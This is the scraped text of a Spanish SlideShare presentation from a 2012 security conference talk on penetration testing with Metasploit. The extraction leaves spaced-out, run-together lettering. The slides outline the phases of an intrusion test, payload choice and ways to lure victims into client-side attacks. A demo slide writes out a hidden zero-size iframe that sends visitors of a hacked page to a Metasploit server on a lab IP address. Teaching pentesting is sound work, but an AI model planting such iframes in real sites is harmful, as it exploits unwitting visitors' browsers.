Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

Pentesting con metasploit framework

869 visualizaciones

Publicado el

Charla impartida por Pablo González, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.

Publicado en: Tecnología
  • Sé el primero en comentar

  • Sé el primero en recomendar esto

Pentesting con metasploit framework

  1. 1. Pe n t e s t i n g c o n Me t a s p l o i t F r a me w o r k Pablo González
  2. 2. ¿Qué e sMe t a s p l o i t ?Es e l c a o s , p u r o y b e l l o p o rf u e r a , e t e r n o y c o mp l e j o p o rd e n t r o , e s p u r o p e n t e s t i n g …
  3. 3. Ag e n d a1. A r q u i t e c t u r a d e Me t a s p l o i t2. Fases de un test de intrusión3. ¿Dónde p a r t i c i p a Me t a s p l o i t ?4. El arte de la intrusión5. El bien y el mal…6. D e m o7. L a t i e n d a e n c a s a
  4. 4. Ar q u i te c t u r a ?
  5. 5. Fases Test Intrusión
  6. 6. Fa s e sAlcance y términos del test de intrusiónRecolección de informaciónAnálisis d e v u l n e r a b i l i d a d e sExplotación d e v u l n e r a b i l i d a d e sPost-Explotación d e l s i s t e m aGeneración d e i n f o r m e s
  7. 7. ¿Dóndep a r t i c i p a ?
  8. 8. Lo importante es…P a r t i c i p a r !!!Recolección de informaciónAnálisis d e v u l n e r a b i l i d a d e sExplotación d e v u l n e r a b i l i d a d e sPost-ExplotaciónPero incluso… a y u d a a
  9. 9. El arte de la intrusión
  10. 10. ¿Arte o Ingeniería? Pr o c e d u r e p e n t e s t i n g ; B E GI N wr i t e l n („p a s o 1‟) wr i t e l n („p a s o 2‟) … a r t e ; END; Pr o c e d u r e a r t e ; …
  11. 11. ÁmbitoExplotación vulnerabilidades (pero…)B e s t a n d Wo r s tPr a c t i c e s
  12. 12. Elección d e l p a y l o a dMás d e 200 p a y l o a d s …Son nuestras cartas… ¿Siempreu s a r e mo s a l r e y ?
  13. 13. Tipos de Intrusión¿Cómo l a n z o l o se x p l o i t s ? Sin Interacción… (t e r r o r !) Con Interacción… (c l i e n t -s i d e a t t a c k !)
  14. 14. Cl i e n t Si d e At t a c k !D a r k S h a d o w s , ¿Cómo hago paraque hagan peticiones a mí?M a i l i n g ? (s p a m ? ? ) Foros… Páginas w e b h a c k e a d a s …P u b l i c a c i o n e s e n I n t e r n e tA c o r t a d o r e s …A t a q u e s l o c a l e s (D N S Sp o o f )
  15. 15. El bien y el mal…
  16. 16. El límiteDebemos ser éticos… ¿Lo s o m o s ?La delgada línea…P o d e mo s u t i l i z a r l o sa t a q u e s c l i e n t -s i d ep a r a : (m u c h a s , m u c h a sc o s a s ) Distribución malware… P a y l o a d s p e r ma n e n t e s
  17. 17. D e mo : Aj u g a r !
  18. 18. ¿Qué v a m o s a h a c e r ?Escenario: (idea del mundo real… ^ ^ )1. Página h a c k e a d a …2. I f r a m e q u e a p u n t e a 1 s e r v e r c o n MS F3. L a n z a m i e n t o d e e x p l o i t s c o n t r a c l i e n t e4. Obtenemos el control…
  19. 19. I f r a me …<i f r a m es r c =h t t p ://192.168.56.101:8080/ w i d t h =0 h e i g h t =0s t y l e =“h i d d e n ”f r a m e b o r d e r =0m a r g i n h e i g h t =0m a r g i n w i d t h =0/>
  20. 20. L a t i e n d a e n c a s a
  21. 21. He tenido el honor……y han tenido la paciencia…Me t a s p l o i t p a r aPe n t e s t e r s

×